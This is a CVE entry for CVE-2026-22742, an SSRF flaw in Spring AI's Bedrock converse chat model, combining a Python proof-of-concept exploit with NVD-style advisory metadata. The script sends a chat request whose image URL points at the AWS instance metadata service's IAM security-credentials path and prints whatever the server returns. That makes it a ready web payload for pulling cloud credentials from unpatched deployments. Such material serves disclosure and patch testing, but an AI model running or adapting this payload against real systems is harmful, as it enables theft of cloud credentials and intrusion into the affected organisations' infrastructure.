CVE-2026-22742

import requests import json # Target vulnerable Spring AI endpoint # Replace with actual vulnerable endpoint URL target_url = "http://vulnerable-spring-ai-app/api/chat" # Malicious payload demonstrating SSRF # Attempting to access internal metadata service (AWS Example) ssrf_payload = { "messages": [ { "role": "user", "content": [ { "type": "image_url", "image_url": { # URL pointing to internal service "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" } }, { "type": "text", "text": "Describe what you see in this image link." } ] } ], "options": { "model": "anthropic.claude-3-sonnet-20240229-v1:0" } } try: headers = {"Content-Type": "application/json"} # Send the malicious request response = requests.post(target_url, data=json.dumps(ssrf_payload), headers=headers, timeout=10) if response.status_code == 200: print("[+] SSRF Request sent successfully!") print("[+] Server response:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-22742", "sourceIdentifier": "[email protected]", "published": "2026-03-27T06:16:37.833", "lastModified": "2026-05-10T14:16:48.260", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Spring AI's spring-ai-bedrock-converse contains a Server-Side Request Forgery (SSRF) vulnerability in BedrockProxyChatModel when processing multimodal messages that include user-supplied media URLs. Insufficient validation of those URLs allows an attacker to induce the server to issue HTTP requests to unintended internal or external destinations.\nThis issue affects Spring AI: from 1.0.0 before 1.0.5, from 1.1.0 before 1.1.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.0.5", "matchCriteriaId": "28BAEC64-E23B-478B-B206-5580BB00516F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.1.0", "versionEndExcluding": "1.1.4", "matchCriteriaId": "E3774C35-AE82-486B-8E13-8FCC34D3CA30"}]}]}], "references": [{"url": "https://spring.io/security/cve-2026-22742", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}